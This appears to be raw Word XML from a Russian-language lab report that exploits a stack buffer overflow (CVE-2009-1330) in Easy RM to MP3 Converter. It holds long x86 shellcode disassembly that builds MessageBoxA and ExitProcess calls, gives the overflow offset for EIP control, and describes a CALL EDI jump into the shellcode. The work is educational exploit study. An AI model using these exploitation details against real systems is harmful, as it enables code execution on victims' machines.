    <w:p w14:paraId="27F95D4C" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>b4: 53                      push   ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247CF9F0" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>b5: ff d5                   call   ebp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698D310B" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>b7: 83 ec 10                sub    esp,0x10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689F706D" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>ba: 89 e3                   mov    ebx,esp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A8E1FC" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>bc: 53                      push   ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F258F7" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>bd: ff d0                   call   eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504BBC18" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="047BBFB0" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A7563AF" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>\x68\x32\x30\x32\x35 push 0x35323032</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247DF283" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ECD5F70" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>4:  0f b7 43 02             movzx  eax,WORD PTR [ebx+0x2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D308FA" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>0:  31 c9                   xor    ecx,ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760C4EFC" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>2:  b1 0a                   mov    cl,0xa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513F169A" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>4:  f6 f9                   idiv   cl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C52F1ED" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>6:  80 c4 30                add    ah,0x30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15180517" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>9:  04 30                   add    al,0x30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5587FDB9" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>b:  05 00 00 2e 20          add    eax,0x202e0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1D8F27" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>10: 50                      push   eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5209A90D" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>11: 0f b7 43 06             movzx  eax,WORD PTR [ebx+0x6]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A7486A" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>15: b1 0a                   mov    cl,0xa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4791EB8A" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>17: f6 f9                   idiv   cl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4405EF97" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>19: 80 c4 30                add    ah,0x30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C54142" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>1c: 04 30                   add    al,0x30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54654CCE" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>1e: 05 00 00 2e 20          add    eax,0x202e0000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D404DC8" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>23: 50                      push   eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F4CE6B" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>24: 89 e1                   mov    ecx,esp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689FB3C3" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>26: 31 c0                   xor    eax,eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C03853" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>28: 50                      push   eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563DA4FD" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15EF59C6" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>;push 0x111111</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A53CEEF" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>;push ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C365DAD" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>;call sprintf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB467D3" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FFFE969" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>bf: 90                      nop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AA4060" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>c0: 90                      nop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59749DE8" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69DAB102" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>xchg eax, esi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C590DE" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="075340C9" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>;MessageBoxA-2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE911F9" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B6344B7" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>0:  68 50 77 6e 64          push   0x646e7750</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4FF05B" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>5:  89 e7                   mov    edi,esp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C49EAA" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>7:  6a 40                   push   0x40</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D079DCD" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>9:  57                      push   edi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683D843B" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>a:  51                      push   ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B06C592" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>b:  6a 00                   push   0x0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD6285C" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>d:  ff d0                   call   eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD745B6" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C9A2D5D" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61CAFEE2" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>;Exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A1037C" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>e8: 83 c4 10                add    esp,0x10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130F8EA8" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>eb: 68 65 73 73 61          push   0x61737365</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E07801" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>f0: 66 83 6c 24 03 61       sub    WORD PTR [esp+0x3],0x61</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C68A84F" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>f6: 68 50 72 6f 63          push   0x636f7250</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560DD8C2" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>fb: 68 45 78 69 74          push   0x74697845</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C416044" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>100:    54                      push   esp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23171015" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>101:    53                      push   ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D0C760" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>102:    ff d5                   call   ebp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527D8E3B" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>104:    31 c9                   xor    ecx,ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C65DE7" w14:textId="77777777" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>106:    51                      push   ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3BF7F8" w14:textId="160D330C" w:rsidR="00FF1575" w:rsidRPr="00FF1575" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:t>107:    ff d0                   call   eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC2E79C" w14:textId="07C5FE92" w:rsidR="00A75863" w:rsidRDefault="00A75863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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="511AAE13" w14:textId="4540B53A" w:rsidR="00A75863" w:rsidRPr="00A75863" w:rsidRDefault="00A75863" w:rsidP="00A75863">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:before="240"/>
        <w:jc w:val="left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</w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Эксплуатация приложения «</w:t>
      </w:r>
      <w:r w:rsidRPr="00A75863">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Easy RM to MP3 Converter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C821F62" w14:textId="77777777" w:rsidR="003C1975" w:rsidRDefault="00A75863" w:rsidP="003C1975">
      <w:pPr>
        <w:keepNext/>
        <w:suppressAutoHyphens/>
        <w:spacing w:before="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Была выбрана программа с уязвимостью </w:t>
      </w:r>
      <w:r w:rsidRPr="00A75863">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>CVE:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A75863">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2009-1330, связанная с переполнением стекового буфера.</w:t>
      </w:r>
      <w:r w:rsidR="00485B27">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF73B4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Уязвимость находится при чтении файла типа </w:t>
      </w:r>
      <w:r w:rsidR="00CF73B4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">.m3u. </w:t>
      </w:r>
      <w:r w:rsidR="00CF73B4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35E82BE1" wp14:editId="496DBF0B">
            <wp:extent cx="5098368" cy="3501621"/>
            <wp:effectExtent l="0" t="0" r="7620" b="3810"/>
            <wp:docPr id="3" name="Рисунок 3" descr="Stack Based Buffer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ck Based Buffer Overflo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612" cy="350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F371" w14:textId="013A23DE" w:rsidR="00485B27" w:rsidRPr="003C1975" w:rsidRDefault="003C1975" w:rsidP="003C1975">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1975">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="003C1975">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="003C1975">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="003C1975">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00EC5762">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="003C1975">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="003C1975">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> - переполнение с помощью файла </w:t>
      </w:r>
      <w:r w:rsidRPr="003C1975">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="003C1975">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="003C1975">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32940939" w14:textId="23E0156F" w:rsidR="00FF1575" w:rsidRDefault="003C1975" w:rsidP="00485B27">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:befor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Сначала дойдем до переполнения с </w:t>
      </w:r>
      <w:r w:rsidR="00485B27" w:rsidRPr="00485B27">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>26055</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00485B27">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>количеств</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ом</w:t>
      </w:r>
      <w:r w:rsidRPr="00485B27">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> байт</w:t>
      </w:r>
      <w:r w:rsidR="00485B27">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00485B27" w:rsidRPr="00485B27">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>после этого можно контролировать EIP</w:t>
      </w:r>
      <w:r w:rsidR="00485B27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</w:t>
      </w:r>
      <w:r w:rsidR="00485B27">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Р</w:t>
      </w:r>
      <w:r w:rsidR="00485B27" w:rsidRPr="00485B27">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>егистр EDI в момент переполнения содержит адрес, который указывает на начало шелл-кода внутри буфера.</w:t>
      </w:r>
      <w:r w:rsidR="00485B27" w:rsidRPr="00485B27">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00485B27" w:rsidRPr="00485B27">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Когда срабатывает CALL EDI, процессор переходит к выполнению шелл-кода</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
